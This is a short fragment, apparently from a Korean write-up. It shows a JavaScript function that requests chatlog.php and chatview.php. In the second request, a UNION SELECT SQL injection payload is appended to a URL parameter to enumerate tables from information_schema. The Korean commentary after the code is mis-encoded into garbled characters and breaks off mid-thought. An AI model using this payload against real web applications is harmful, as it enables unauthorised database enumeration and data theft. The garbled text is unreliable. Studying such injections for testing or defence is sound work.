function getchatlog(type){ xmlhttp = new XMLHttpRequest(); if(type==0){xmlhttp.onreadystatechange=getni;xmlhttp.open("GET","chatlog.php?t=1"); }else if(type==1){xmlhttp.onreadystatechange=chatprint;xmlhttp.open("GET","chatview.php?t=1&ni="+ni + " union select 1,table_name,3,4,5 from information_schema.tables--");} xmlhttp.send(null); } ๊ฐ๋จํ SQL Injection ์ด๋๋ค. ๊ทธ๋ฆฌ๊ณ ํธ๋ํฝ์ ์ค์ด๊ธฐ ์ํด ํ ์ ์๋๊ฒ ๋ฌด์์ด ์๋์ง ๋ฌผ์ด๋ณด๋ ..
